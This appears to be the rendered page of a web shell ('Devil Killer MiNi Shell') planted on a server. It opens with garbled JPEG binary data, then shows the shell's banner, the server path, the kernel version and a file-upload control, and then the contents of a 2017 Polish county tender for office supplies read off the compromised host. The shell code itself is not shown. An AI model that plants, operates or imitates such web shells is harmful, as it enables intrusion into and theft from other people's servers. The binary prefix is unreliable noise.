JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170329/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170329/54077-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.powiat.nowy-sacz.pl' target='_blank'>http://www.bip.powiat.nowy-sacz.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 54077 - 2017
              z dnia 2017-03-29 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Nowy Sącz: Zamówienie na dostawę materiałów biurowych<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiat Nowosądecki, Zarząd Powiatu Nowosądeckiego, krajowy numer identyfikacyjny
              49189330000000, ul.
              ul. Jagiellońska 
              33,
              33300  
              Nowy Sącz, woj.
              małopolskie, państwo
              Polska, tel.
              184 141 600, e-mail
              bziecina@nowosadecki.pl, mzelasko@nowosadecki.pl, faks
              184 141 700.
              <br />
              Adres strony internetowej (URL): www.nowosadecki.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.powiat.nowy-sacz.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />oferta wraz z wymienionym w art. 25a ust. 1 ustawy oświadczeniem oraz pełnomocnictwa wnoszone są do zamawiającego wyłącznie w formie pisemnej za pośrednictwem operatora pocztowego, osobiście lub za pośrednictwem posłańca<br />
                Adres:
                <br />Starostwo Powiatowe w Nowym Sączu, ul. Jagiellońska 33, 33-300 Nowy Sącz</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zamówienie na dostawę materiałów biurowych<br /><b>Numer referencyjny: </b>ZP.272.6.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa do siedziby zamawiającego materiałów biurowych (materiały biurowe, papier ksero A4).

We wszystkich pozycjach, w których występuje znak towarowy, patent, pochodzenie, nazwa własna towaru lub jego producenta zamawiający dopuszcza możliwość dostawy towarów równoważnych tj. spełniających wszystkie podane w opisie parametry techniczne. W przypadkach, w których przedmiot zamówienia opisany jest za pomocą norm zamawiający dopuszcza rozwiązania równoważne. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez zamawiającego.


CZĘŚĆ 1 ZAMÓWIENIA  Materiały biurowe:
1	Długopis czarny	Długopis żelowy, przezroczysta obudowa, wkłady wymienne, grubość linii pisania - 0,27mm, końcówka wykonana z metalu, kulka wykonana z węglika wolframu, kolor tuszu: czarny.	200	szt.
2	Długopis niebieski	Długopis żelowy, przezroczysta obudowa, wkłady wymienne, grubość linii pisania - 0,27mm, końcówka wykonana z metalu, kulka wykonana z węglika wolframu , kolor tuszu: niebieski.	200	szt.
3	Długopis żelowy czerwony	Długopis z wymiennym wkładem żelowym, linia pisania 0.3 mm. Końcówka wykonana z metalu, oprawa przeźroczysta. Długość linii pisania ok. 900 m. Kolor tuszu czerwony.	30	szt.
4	Dziurkacz mały	Dziurkacz, z plastikowym ramieniem i metalową podstawą, listwą formatową i wskaźnikiem środka strony, rozstaw dziurek: 80mm, średnica otworu:                5 mm, jednorazowo dziurkuje do 20 kartek.	30	szt.
5	Dziurkacz duży	Dziurkacz z listwą formatową i wskaźnikiem środka strony, rozstaw dziurek: 80mm, średnica otworu:                       5 mm do 6 mm, jednorazowo dziurkuje do 100 kartek.	6	szt.
6	Klej Biurowy Sztyft 35g	Klej biurowy w sztyfcie, bezbarwny, bezwonny, nietoksyczny, niebrudzący, zmywalny, 2- letni okres stosowania bez utraty właściwości, pojemność minimum 35 g.	300	szt.
7	Skoroszyt A4 papierowy zawieszkowy	Skoroszyt zawieszkowy z białego kartonu o gramaturze 275 g., pełny, format A4.	500	szt.
8	Klips Archiwizacyjny	Klips archiwizacyjny, dwuczęściowy, plastikowy biały przeznaczony do archiwizacji dokumentów, umożliwia szybkie i łatwe przeniesienie dokumentów z segregatora, ułatwia korzystanie z dokumentów zarchiwizowanych w pudełkach na akta. 	4000	szt.
9	Koperta DL biała 	Koperty DL o wymiarach 110 x 220 mm, samoklejące, białe, gram. 75g/m2. 	15000	szt.
10	Koperta bąbelkowa	Koperta bąbelkowa, powietrzna 19l.	100	szt.
11	Koperta bąbelkowa	
Koperta bąbelkowa, powietrzna 17G.
	100	szt.
12	Koperta bąbelkowa	Koperta bąbelkowa, powietrzna 16F.	100	szt.
13	Koperta B5 brązowa	Koperty samoklejące, brązowe, o wymiarach 176 x 250 mm z papieru natronowego o gram. 90 g/m2. 	3000	szt.
14	Koperta bąbelkowa	Koperta bąbelkowa, powietrzna 14D.	100	szt.
15	Koperta bąbelkowa	Koperta bąbelkowa, powietrzna 18H.	100	szt.
16	Koperta B4	Koperty samoklejące B4 SK, brązowe o gram. 90 g/m2. 	3000	szt.
17	Koperta C4 brązowa	Koperty samoklejące C4 SK, brązowe, z papieru natronowego o gram. 90 g/m2. (250szt./op.).	500	szt.
18	Koperta C6 biała	Koperty C6, białe samoklejące o gram. 75g/m2. 	70000	szt.
19	Korektor w pasku	Korektor w pasku umieszczonym na specjalnej taśmie, długość taśmy: 8 m, szerokość taśmy: 5 mm, nietoksyczny, do zastosowania na wszystkich rodzajach papieru, przezroczysta obudowa pozwalająca kontrolować stan zużycia.	50	szt. 
20	Kostka biurowa klejona	Kostka papierowa z kartkami do notatek. Zawiera około 400 karteczek klejonych wzdłuż jednego boku. Wymiary: 8,5 x 8,5 cm. Kolor: biały.	100	szt.
21	Koszulka na dokumenty A4	Koszulka foliowa na dokumenty A4, krystaliczna, grubość: co najmniej 48mic.	20000	szt.
22	Linijka 30cm	Linijka 30cm, z przezroczystego polistyrenu, trwałe, nieścieralne podziałki, zaokrąglone rogi.	20	szt.
23	Marker olejowy	Marker olejowy SC-PM czarny 2mm.	10	szt.
24	Marker olejowy	Marker olejowy 0,5 mm, 780, kolor srebrny.	10	szt.
25	Marker niebieski	Marker permanentny, posiada mocną i odporną na ścieranie akrylową końcówkę, okrągłą, śr. 1,5 mm. 	120	szt.
26	Marker czarny	Marker permanentny, posiada mocną i odporną na ścieranie akrylową końcówkę, okrągłą, śr. 1,5 mm. 	120	szt.
27	Nożyczki biurowe	Nożyczki biurowe, z satynowym ostrzem ze stali nierdzewnej, ergonomicznie wyprofilowana rękojeść z niełamliwego plastiku, z ostrzem o długości                   ok. 25,5 cm.	80	szt.
28	Papier do plotera 	Papier do plotera, kolor: biały, szerokość: 841mm, gramatura 80 g/m2, nieprzezroczystość: co najmniej 93%, białość: 165 (3) CIE, bezpyłowy, spełniający wymogi standardów DIN 6723 i 6724-1 w rolkach minimum 110m, rolka na wałek o średnicy ~75mm do plotera OCE TDS 450.	5	szt.
29	Przybornik biurkowy	Przybornik na biurko wielofunkcyjny zwierający miejsce na: przybory do pisania, spinacze, kostkę biurową, formatu 90 x 90 mm, rolkę na taśmę klejącą 18mm, przezroczysty.	25	szt.
30	Taśma dwustronna	Taśma dwustronna 38 mm/5m.	10	szt.
31	Taśma klejąca piankowa	Taśma klejąca piankowa 19mm/5m dwustronna.	10	szt.
32	Skoroszyt zawieszkowy A4 plastikowy 	Skoroszyt zawieszkowy A4 miękki do przechowywania i prezentowania dokumentów. Przezroczysta przednia okładka umożliwia szybkie odszukanie odpowiedniego skoroszytu. Wykonany z folii PP. Szerokość: 226 5mm, wysokość: min 1mm, głębokość: 310  5mm.	1000	szt.
33	Spinacz biurowy 50mm 	Spinacze biurowe metalowe, rozmiar 50 mm. Pakowane w kartonowe pudełko po 100 sztuk.	300	op.
34	Spinacz biurowy 28mm 	Spinacze biurowe metalowe, małe 28 mm. Pakowane w kartonowe pudełko po 100 sztuk.	300	op.
35	Szuflada na dokumenty	Szuflada/półka na dokumenty wykonana z wytrzymałego plastiku. Półki mogą być łączone w pionie. Przezroczysta.	100	szt.
36	Taśma pakowa przezroczysta	Taśma pakowa przezroczysta wykonana z polipropylenu, pokryta emulsyjnym klejem akrylowym, wymiary: 48mm x 66m.	60	szt.
37	Taśma pakowa szara 	Taśma pakowa, szara wykonana z polipropylenu, pokryta emulsyjnym klejem akrylowym, wymiary: 48mm x 66m.	10	szt.
38	Teczka do podpisu	Książka do podpisu, na dokumenty o formacie A4, okładki z twardego kartonu pokrytego folią PP- na przedniej okładce, otwierane okienko do opisu zawartości książki, 20 przegródek wewnętrznych z 3 otworami do podglądu zawartości w każdej, rozciągliwy grzbiet typu harmonijka, kolor: czarny.	15	szt.
39	Tusz do stempli tradycyjnych czerwony	Tusz do stempli zwykłych i polimerowych, bezolejowy, pojemność: nie mniej niż 25ml, kolor: czerwony.	20	szt.
40	Tusz do stempli tradycyjnych czarny	Tusz do stempli zwykłych i polimerowych, bezolejowy, pojemność: nie mniej niż 25ml, kolor: czarny.	5	szt.
41	Zakładka indeksujaca kolorowa	Zakłada indeksująca samoprzylepna neonowa. Wymiary 4x5cm, cztery neonowe kolory w opakowaniu. Ilość zakładek minimum 4x50 sztuk w opakowaniu.	15	op.
42	Zeszyt - Brulion A4	Zeszyt A4 96 kartkowy w kratę, bez marginesu, oprawa twarda.	60	szt.
43	Zeszyt - Brulion A5	Zeszyt A5 96 kartkowy w kratę, bez marginesu, oprawa twarda.	60	szt.
44	Klip metalowy 41mm	Klip metalowy do papieru, galwanizowany, czarny. Rozmiar 41 mm.	150	szt.
45	Zakreślacz zielony	Zakreślacz fluorescencyjny, z tuszem na bazie wody, do pisania na wszystkich rodzajach papieru (również faksowym i samokopiującym), odporny na wysychanie, szerokość linii od 2 do 5 mm, kolor: zielony.	130	szt.
46	Zakreślacz żółty	Zakreślacz fluorescencyjny, z tuszem na bazie wody, do pisania na wszystkich rodzajach papieru (również faksowym i samokopiującym), odporny na wysychanie, szerokość linii od 2 do 5 mm, kolor: żółty.	130	szt.
47	Blok biurowy/listowy A4	Blok szkolny w kratkę. Klejony u góry, 50 kartek, kolor biały. Format A4.	100	szt.
48	Zszywacz duży	Zszywacz długoramienny, zszywa jednorazowo do 200 arkuszy papieru 80g, możliwość zastosowania zszywek o rożnych rozmiarach, solidna metalowa podstawa i metalowe ramię, z podstawką antypoślizgową. Zszywanie otwarte i zamknięte - łatwe do zmiany poprzez przekręcenie metalowej stopki.	7	szt.
49	Holder z klipsem	Holder z klipsem przezroczysty, z polipropylenu, 86 x 54 mm, na 1 kartę plastikową z nalepką (ok. 1 mm grubości), klips CT 211.	300	szt.
50	Zszywacz mały	Zszywacz biurowy, minimum na zszywki 24/6 i 26/6. Wykonany z plastiku, części mechaniczne z metalu. Antypoślizgowa plastikowa podstawka zabezpiecza przed rysowaniem mebli. Zszywa do 25 kartek (papier 80 g). Zszywanie otwarte i zamknięte - łatwe do zmiany poprzez przekręcenie metalowej stopki. Blokada zabezpieczająca przed zamknięciem zszywacza.	80	szt.
51	Zszywki 23/10 	Zszywki miedziowane do zszywaczy 23/10, opakowanie: 1000 szt.	30	op.
52	Zszywki 23/17 	Zszywki miedziowane do zszywaczy klasy 23/17, opakowanie: 1000 szt.	30	op.
53	Zszywki 24/6 	Zszywki miedziowane do zszywaczy klasy 24/6, opakowanie: 1000 szt.	500	op.


Termin wykonania CZĘŚĆ 1 ZAMÓWIENIA - nie dłużej niż 14 dni kalendarzowych od dnia zawarcia umowy.



CZĘŚĆ 2 ZAMÓWIENIA  Papier ksero A4 biały, Gramatura (g/m): 80, Białość (CIE): min 140, nieprzezroczystość (%): 94 +2/-1 , Grubość (m): 1083, Gładkość: 18050,  (ryza/500 akr.)	2500	ryz.

Termin wykonania CZĘŚĆ 2 ZAMÓWIENIA - nie dłużej niż 14 dni kalendarzowych od dnia zawarcia umowy.
<br /><br /><b>II.5) Główny kod CPV: </b>30190000-7<br /><b> Dodatkowe kody CPV:</b>30192121-5,
                30197330-8,
                24910000-6,
                22851000-0,
                30192000-1,
                30199230-1,
                30192160-0,
                22816100-4,
                30237430-2,
                39241200-5,
                30197642-8,
                30193200-0,
                44424200-0,
                30197220-4,
                22600000-6,
                22816300-6,
                22800000-8,
                30192125-3,
                22816000-3,
                30197320-5,
                30197100-7,
                39292500-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 14<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca byłby zobowiązany wykazać w sposób szczególny.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca byłby zobowiązany wykazać w sposób szczególny.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca byłby zobowiązany wykazać w sposób szczególny.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Do oferty powinien być dołączony dokument określający zasady reprezentacji oraz osoby
uprawnione do reprezentowania wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik
także pełnomocnictwo, określające zakres umocowania, podpisane przez osobę/osoby
uprawnione do reprezentowania wykonawcy. Pełnomocnictwo do podpisania oferty winno
być dołączone do oferty w formie oryginału lub kopii potwierdzonej notarialnie, o ile prawo
do podpisania oferty nie wynika z innych dokumentów dołączonych do oferty. 2.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku
wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie
zamówienia publicznego. Oferta złożona przez spółkę cywilną traktowana jest jako oferta
wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokument
potwierdzający ustanowienie pełnomocnictwa powinien zawierać wskazanie postępowania
o zamówienie publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o
udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania.
Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli
wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej.
Dokument pełnomocnictwa należy przedstawić w formie oryginału lub kopii potwierdzonej
notarialnie. 3. Zgodnie z art. 24 ust. 11 ustawy, w terminie 3 dni od dnia zamieszczenia
przez zamawiającego na stronie internetowej informacji, o której mowa w art. 86 ust. 5
ustawy, wykonawca przekazuje zamawiającemu oświadczenie o przynależności lub braku
przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007
r. o ochronie konkurencji i konsumentów (Dz. U. z 2015 r. poz. 184, 1618 i 1634).
Formularz oświadczenia zostanie opublikowany na stronie internetowej zamawiającego
